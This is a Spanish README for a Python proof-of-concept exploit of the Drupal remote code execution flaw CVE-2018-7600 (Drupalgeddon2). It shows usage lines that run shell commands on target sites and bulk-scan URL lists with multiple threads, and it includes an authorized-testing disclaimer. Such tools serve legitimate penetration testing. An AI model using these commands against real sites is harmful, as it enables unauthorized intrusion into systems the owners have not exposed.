
Este repositorio contiene un Proof-of-Concept (PoC) completamente original y de desarrollo propio para CVE-2018-7600, también conocido como Drupalgeddon 2 — una vulnerabilidad crítica de ejecución remota de código que afecta a las versiones 7 y 8 del núcleo de Drupal.
Este repositorio contiene un exploit de prueba de concepto basado en Python para la vulnerabilidad crítica de ejecución remota de código en Drupal, conocida como Drupalgeddon2 (CVE-2018-7600). Este script está diseñado con fines educativos y para que los profesionales de seguridad lo utilicen en escenarios de pruebas de penetración autorizadas.
Esta herramienta está destinada únicamente a fines legales y éticos. Usar este script en cualquier sistema sin el permiso explícito del propietario es ilegal. El autor y los colaboradores no son responsables de ningún uso indebido o daño causado por este script. Úselo bajo su propio riesgo.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
El script ofrece varios argumentos de línea de comandos para personalizar su ejecución.
Explotar un solo objetivo con el comando predeterminado (whoami):
python3 drupalgeddon2.py -t http://example.com
Explotar un solo objetivo con un comando personalizado (p. ej., ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Escanear una lista de objetivos desde un archivo:
Cree un archivo llamado targets.txt con una URL por línea:
http://site1.com
https://site2.org
http://site3.net
Luego ejecute el script:
python3 drupalgeddon2.py -l targets.txt
Escanear una lista con un comando personalizado y más hilos:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Guardar la salida en un archivo de registro:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argumento | Corto | Descripción | Por defecto |
|---|---|---|---|
--target | -t | Una URL de objetivo única. | - |
--list | -l | Ruta a un archivo que contiene una lista de URLs objetivo. | - |
--command | -c | El comando a ejecutar en el objetivo. | whoami |
--threads | -T | Número de hilos concurrentes a utilizar. | 5 |
--output | -o | Archivo para registrar la salida. | - |
--timeout | Tiempo de espera de la petición en segundos. | 15 |